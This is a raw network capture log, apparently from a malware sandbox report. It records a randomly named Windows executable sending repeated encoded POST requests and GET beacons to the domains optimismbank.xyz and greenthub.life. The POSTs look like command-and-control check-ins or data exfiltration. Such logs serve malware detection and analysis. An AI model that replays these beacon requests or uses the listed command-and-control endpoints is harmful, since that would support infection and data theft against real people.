Nov 24, 2024 08:28:50.218195915 CET	778	OUT	POST /98j3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.optimismbank.xyz Origin: http://www.optimismbank.xyz Referer: http://www.optimismbank.xyz/98j3/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 70 33 78 56 47 76 65 52 32 6e 76 55 51 33 48 66 77 48 72 4e 78 6f 45 62 53 44 51 33 38 4a 44 59 57 33 34 51 48 57 77 73 46 33 76 79 Data Ascii: ftMDw=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMp3xVGveR2nvUQ3HfwHrNxoEbSDQ38JDYW34QHWwsF3vy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49836	13.248.169.48	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:28:52.887691021 CET	802	OUT	POST /98j3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.optimismbank.xyz Origin: http://www.optimismbank.xyz Referer: http://www.optimismbank.xyz/98j3/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 6a 48 58 45 73 4b 48 5a 51 52 4c 6a 50 4a 6d 37 46 62 42 64 6e 53 30 59 50 69 34 58 2b 76 48 62 61 42 62 61 46 79 42 34 2f 48 50 59 62 6d 4b 61 4e 45 4b 54 6f 76 75 59 68 75 4a 41 64 31 31 64 51 59 48 4c 51 42 56 34 57 43 49 75 61 4c 78 41 6b 32 4d 4c 34 72 48 33 6c 59 51 42 4e 39 41 5a 6e 43 58 55 58 45 5a 41 5a 54 34 4e 6b 73 36 4f 47 56 6f 78 64 6f 6b 57 59 57 41 4e 61 43 6e 32 66 6b 59 68 61 46 73 30 72 75 6a 34 6b 5a 53 42 49 46 38 70 44 79 55 33 41 51 56 42 38 4c 4b 44 4b 52 62 53 64 63 42 34 4e 55 61 4a 35 61 76 4e 77 43 2b 33 68 66 6a 77 3d 3d Data Ascii: ftMDw=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj4kZSBIF8pDyU3AQVB8LKDKRbSdcB4NUaJ5avNwC+3hfjw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49843	13.248.169.48	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:28:55.563256025 CET	1815	OUT	POST /98j3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.optimismbank.xyz Origin: http://www.optimismbank.xyz Referer: http://www.optimismbank.xyz/98j3/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 72 48 58 32 6b 4b 48 34 51 52 4b 6a 50 4a 6c 37 46 57 42 64 6e 50 30 59 57 72 34 58 44 4e 48 59 69 42 5a 35 4e 79 52 4e 54 48 45 59 62 6d 58 4b 4e 51 4f 54 70 31 75 59 78 71 4a 41 4e 31 31 64 51 59 48 49 59 42 52 73 43 43 45 4f 61 49 34 67 6b 41 47 62 34 58 48 33 39 69 51 42 41 4b 41 4a 48 43 58 77 7a 45 4b 6a 78 54 6b 64 6b 55 35 4f 47 4e 6f 78 52 33 6b 57 55 30 41 4d 2b 6f 6e 31 44 6b 4f 48 62 41 39 6e 7a 6e 36 70 67 4f 4c 78 38 55 30 34 6a 65 53 31 46 30 61 78 4d 47 4b 48 48 36 57 48 34 41 44 5a 67 50 4d 2f 56 58 6d 70 6c 37 32 6d 45 58 34 78 71 47 49 72 6b 2f 47 6e 73 53 48 71 35 69 74 4c 71 6d 37 73 58 45 4b 4f 70 68 6c 41 4f 2b 61 31 2f 67 45 70 43 6a 2b 48 45 68 45 51 2f 32 30 75 5a 33 55 5a 66 50 77 53 6d 44 30 71 32 46 50 39 39 6d 45 56 50 48 35 58 31 6c 62 6d 4d 4c 52 55 2b 35 46 32 6a 56 6e 32 45 2f 47 37 6d 62 56 6e 48 78 53 6b 72 53 64 48 30 7a [TRUNCATED] Data Ascii: ftMDw=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJrHX2kKH4QRKjPJl7FWBdnP0YWr4XDNHYiBZ5NyRNTHEYbmXKNQOTp1uYxqJAN11dQYHIYBRsCCEOaI4gkAGb4XH39iQBAKAJHCXwzEKjxTkdkU5OGNoxR3kWU0AM+on1DkOHbA9nzn6pgOLx8U04jeS1F0axMGKHH6WH4ADZgPM/VXmpl72mEX4xqGIrk/GnsSHq5itLqm7sXEKOphlAO+a1/gEpCj+HEhEQ/20uZ3UZfPwSmD0q2FP99mEVPH5X1lbmMLRU+5F2jVn2E/G7mbVnHxSkrSdH0zCJooEbfdFkHy4Ad/fbclAFk2zTjm8wNdxvXKhyhUA81ZfvWZ+O5RqFxu6gakiQjIkEKqLjr0Uq7EeZHwXMUIv3mMOtJXXfh/xPUr3PKEU565hHWIzKAatCX3pCFmjRvo/BbnJ/8lFHW3aACAn6y3q3p4eOKLurn8knOE8Cfs4TvdWt2OxGrW5BT0SYmfj463CSGjzUeIgQ3YG/lcvPft5nDeUMENPXAtyVYzqIgl+slmtwFWy4nUrL1j42Myt6e0o5h4xYkwZ/OeUE1lblmenAvdNrVw4kZMLZPlM2q5K7iSB5J/f+2aVCI+MHUOWrg66bsSMW/zVuiR3kkhr5RSJ7dNoeMjWqGnXYz2qqxcKylYZVOMGtNn6NPZWEkJDB6uApq1iyMVjZIbkMv7pIiNByao4dj4VPwDW1IatzuVBXO2TZxwxnsJXQZJA1Ij/oeRWv+IiEXR14q63W8J1shJjnGpNij0TfQBu9k3pjhlQKBCDkV8/IXVm/WDHeKoFzrjmf8LLIfnnjZvqK7oGOwvCCWXsHs5UO0PQnAfy05A+UDzxx2LkmR7Y7WSIm2loghSVSRSL1ZwE24wISi3Y2amQHEh92yUtZbZZZgQve10ExBIWRJo6JZFBykBBBU+5pcKgdn35wyesAcNV/5BA1cxf1LF+rAFa+C0UI [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49850	13.248.169.48	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:28:58.223838091 CET	519	OUT	GET /98j3/?ftMDw=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoC7f9WIoubj4Q4JNsFH14w6x5H8IcaKKhJ/aIzC8GXeQraEN4MBg=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.optimismbank.xyz User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:28:59.360490084 CET	418	IN	HTTP/1.1 200 OK Server: openresty Date: Sun, 24 Nov 2024 07:28:59 GMT Content-Type: text/html Content-Length: 278 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 74 4d 44 77 3d 6a 6f 31 69 4a 4f 6e 6a 38 75 65 47 5a 50 4a 41 42 66 32 67 30 48 38 48 75 4f 4b 62 4a 67 56 31 44 64 74 53 61 43 53 51 4c 35 76 33 55 45 59 42 45 35 56 41 54 67 72 71 67 75 39 79 43 59 58 55 31 71 54 38 31 55 47 32 48 62 4f 4c 51 4c 42 62 5a 4e 44 6f 43 37 66 39 57 49 6f 75 62 6a 34 51 34 4a 4e 73 46 48 31 34 77 36 78 35 48 38 49 63 61 4b 4b 68 4a 2f 61 49 7a 43 38 47 58 65 51 72 61 45 4e 34 4d 42 67 3d 26 73 38 71 3d 30 52 4a 4c 74 4e 35 50 41 66 6a 78 77 6c 72 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ftMDw=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoC7f9WIoubj4Q4JNsFH14w6x5H8IcaKKhJ/aIzC8GXeQraEN4MBg=&s8q=0RJLtN5PAfjxwlrp"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49866	209.74.77.109	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:05.067977905 CET	772	OUT	POST /r3zg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.greenthub.life Origin: http://www.greenthub.life Referer: http://www.greenthub.life/r3zg/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6e 6e 6a 4a 45 2f 79 42 66 74 61 34 77 30 36 48 34 47 72 78 65 6b 6a 6e 4a 4a 72 54 65 79 6a 46 36 48 4b 6e 73 79 4d 32 71 7a 76 70 61 76 32 6d 4d 4e 39 78 38 78 36 66 46 6e 42 54 52 59 58 61 59 51 69 65 48 4d 4f 69 2f 35 6f 38 76 4d 35 78 73 6a 43 76 41 4e 56 78 76 65 64 53 77 33 46 38 43 32 4c 62 6b 6d 6f 5a 36 63 33 63 2b 71 35 6b 44 6e 68 55 37 64 44 64 5a 63 47 67 59 6e 6c 44 43 45 58 44 72 6d 4b 37 44 68 62 73 5a 6b 77 64 36 39 43 79 51 61 74 42 34 38 49 2f 70 38 79 58 65 4d 75 59 39 46 59 4e 49 45 37 52 32 2f 4a 44 65 74 73 4a 59 6c 50 67 34 41 56 4b 49 34 62 35 Data Ascii: ftMDw=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyQatB48I/p8yXeMuY9FYNIE7R2/JDetsJYlPg4AVKI4b5
Nov 24, 2024 08:29:06.321594954 CET	533	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:29:06 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49874	209.74.77.109	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:07.731071949 CET	796	OUT	POST /r3zg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.greenthub.life Origin: http://www.greenthub.life Referer: http://www.greenthub.life/r3zg/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 48 46 36 6a 61 6e 74 7a 4d 32 6d 54 76 70 52 50 32 6a 52 64 39 2b 38 78 33 38 46 69 68 54 52 59 44 61 59 51 79 65 48 37 69 6a 2b 70 6f 69 6b 73 35 6b 79 54 43 76 41 4e 56 78 76 65 4a 6f 77 30 31 38 44 48 37 62 6c 44 46 72 6b 73 33 66 6f 36 35 6b 4f 48 68 51 37 64 44 6a 5a 65 6a 4e 59 68 70 44 43 47 66 44 72 58 4b 34 5a 78 62 71 64 6b 78 50 32 49 76 57 49 62 41 2f 37 66 78 54 38 63 36 64 53 61 7a 43 68 32 59 75 61 55 62 54 32 39 52 78 65 4e 73 6a 61 6c 33 67 71 58 5a 74 48 4d 2b 61 52 76 73 77 44 6f 51 56 4e 66 52 56 55 6a 46 4f 67 4f 49 79 33 41 3d 3d Data Ascii: ftMDw=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUbT29RxeNsjal3gqXZtHM+aRvswDoQVNfRVUjFOgOIy3A==
Nov 24, 2024 08:29:09.038719893 CET	533	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:29:08 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49881	209.74.77.109	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:10.405950069 CET	1809	OUT	POST /r3zg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.greenthub.life Origin: http://www.greenthub.life Referer: http://www.greenthub.life/r3zg/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 50 46 37 52 53 6e 73 51 30 32 6f 7a 76 70 53 50 32 69 52 64 39 5a 38 78 76 67 46 69 6c 70 52 61 37 61 5a 7a 4b 65 42 50 32 6a 33 70 6f 69 72 4d 35 77 73 6a 43 41 41 4e 6c 31 76 65 5a 6f 77 30 31 38 44 45 54 62 68 57 70 72 6d 73 33 63 2b 71 35 34 44 6e 68 6f 37 64 4c 73 5a 65 6e 37 59 78 4a 44 48 57 50 44 70 46 69 34 53 78 62 6f 61 6b 77 4b 32 49 72 4a 49 62 64 47 37 65 45 4f 38 62 4b 64 52 37 4b 41 31 30 6f 54 45 56 6a 30 6c 38 6c 34 66 70 6f 41 64 55 6e 36 75 6c 46 41 49 2b 2b 51 49 6f 45 71 49 6f 46 54 43 63 42 69 65 6c 77 76 6c 4b 51 35 6c 4b 41 4a 45 43 78 73 4c 7a 6d 6a 74 75 44 52 31 47 7a 47 41 67 79 74 4d 47 41 49 43 2f 77 57 4a 70 74 67 2f 52 2b 41 32 36 78 4c 70 7a 6a 62 32 31 34 59 6e 74 34 48 4d 4d 36 30 5a 39 76 62 36 63 58 45 31 39 57 61 55 55 6a 65 30 64 33 54 4e 35 4b 72 63 7a 6a 69 56 41 67 6c 44 4a 6b 6b 4e 77 71 47 79 54 36 62 36 72 2f 57 [TRUNCATED] Data Ascii: ftMDw=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAPF7RSnsQ02ozvpSP2iRd9Z8xvgFilpRa7aZzKeBP2j3poirM5wsjCAANl1veZow018DETbhWprms3c+q54Dnho7dLsZen7YxJDHWPDpFi4SxboakwK2IrJIbdG7eEO8bKdR7KA10oTEVj0l8l4fpoAdUn6ulFAI++QIoEqIoFTCcBielwvlKQ5lKAJECxsLzmjtuDR1GzGAgytMGAIC/wWJptg/R+A26xLpzjb214Ynt4HMM60Z9vb6cXE19WaUUje0d3TN5KrczjiVAglDJkkNwqGyT6b6r/WtF1rbYOS4nA5PKkCsw/r/AvHFTifzRnlYVckPjYtQ1104SkcS9pmO+ImF2LQCdrjOs5lP/xZ52zZTULunz0S6blkAj2LgQrAx/I2XQ5cZ+n3IYPuWzxZwzl5rbbgFyK6ZuzgQCKgZKZ3+vYOXXTiq2vLES5oJf8ZJXmginJUeQetSUDQRVXAyaT1bMhrHxlhfpvqWHc9T8c6e8Mt31h72ZPZ9eAuZfdFzeizPQjj/+/E+8F/3tv7DGVYMlw2YCQgAIODQjDvwB6r8AmVTcMx7OOJ0B0x7lWfTBgDtBmg4Ql69RzO/96nVO8JLzUPcmQnd45eUOASB4vg/x2whv3/YzSmcqCi/jW8kvnAJtt9UztoyzpEd87l8ej6JhBelDD2hUsBRPgFNgnyR48Zehu9HrFDBJGcBSBeFhPC0W6FF1its37CDbF+IwEXiXv12htv87DfqnAkCFBF/BJ0/FtudljfKGhnjWCvXdQ4wSkiMKG16hKbAP6BBeNQw9OK7ALFwfkE1HpyGVfoSaIVJNCQiwFJcNdsSFMcUC1OG8TrgNTaVLJieO0/csLH/OA+wsdBlcPu64hfePOhzaAHRN8rDHgCc0cv3kA0tRgQO1Pf2BglPXYwoo47utbA2hOWNy2mlWs26/AAwlNdU0eRgcWs5hUTOS7jbpQFoD [TRUNCATED]
Nov 24, 2024 08:29:11.704103947 CET	533	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:29:11 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49888	209.74.77.109	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:13.070003986 CET	517	OUT	GET /r3zg/?ftMDw=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT0074duoQOsgGdcsNcrIEp/1wXAjvdugthi8/c+6JcbCpqpe/rFrA=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.greenthub.life User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:29:14.379695892 CET	548	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:29:14 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 